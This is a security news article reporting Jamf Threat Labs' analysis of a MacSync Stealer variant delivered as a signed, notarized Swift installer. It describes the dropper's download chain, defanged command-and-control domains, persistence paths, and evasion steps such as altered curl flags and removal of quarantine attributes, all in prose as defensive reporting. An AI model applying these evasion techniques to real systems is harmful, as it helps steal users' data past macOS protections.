A newly discovered variant of the MacSync Stealer is exploiting Apple’s trusted app ecosystem by distributing infostealing payloads through signed, notarized Swift applications, according to recent research from Jamf Threat Labs.
This revamped version abandons older execution tricks in favor of stealthier, hands‑off infection chains that can easily bypass user suspicion and built‑in macOS defenses.
Signed and Notarized, Yet Malicious
Unlike previous versions that relied on user‑assisted “drag‑to‑terminal” or “ClickFix” commands, the latest MacSync Stealer arrives as a notarized Swift application embedded in a disk image named zk-call-messenger-installer-3.9.2-lts.dmg, distributed via zkcall[.]net.
Despite being code-signed under Apple’s Developer Team ID GNJLS3UYZ4 (since revoked), the installer silently downloads its payload without user interaction.
Once executed, the dropper retrieves an encoded script from a remote server and runs it through a Swift‑based helper binary.
This executable, titled runtimectl, acts as a downloader that validates internet connectivity, maintains a log file at ~/Library/Logs/UserSyncWorker.log, and creates supporting files within ~/Library/Application Support/UserSyncWorker/ to manage scheduling and persistence.
Jamf’s analysis noted that the application bundle appeared unusually large 25.5 MB due to embedded decoy PDFs intended to obscure its purpose.
VirusTotal samples revealed limited detection, with only one to thirteen antivirus engines flagging the files, often classifying them as generic downloaders associated with the Coinminer or OOOID malware families.
Evasive Execution and C2 Behavior
The runtimectl binary’s key routine, runInstaller(), enforces a one‑hour execution limit to prevent repeated runs.
When network access is confirmed, it fetches an obfuscated payload from https[:]//gatemaden.space/curl/985683… using a custom curl command that includes subtle flag changes (splitting -fsSL into -fL -sS and adding –noproxy), likely to improve reliability and evade detection.
The downloaded script, stored temporarily at /tmp/runner, matches payloads from earlier MacSync Stealer campaigns and communicates with the focusgroovy[.]com domain previously tied to MacSync’s command‑and‑control infrastructure.
Before execution, the malware removes com.apple.quarantine attributes, validates the file with spctl, then runs and deletes it to minimize artifacts.
Jamf reported the malicious developer certificate to Apple, which has since revoked it. The discovery underscores a growing trend of macOS malware leveraging Apple’s notarization system to mask malicious intent.
Security experts warn that code signing alone no longer guarantees security, urging macOS users and administrators to enable advanced threat controls and block‑mode detections to counter evolving infostealers such as MacSync.
Follow us on Google News , LinkedIn and X to Get More Instant Updates, Set Cyberpress as a Preferred Source in Google.
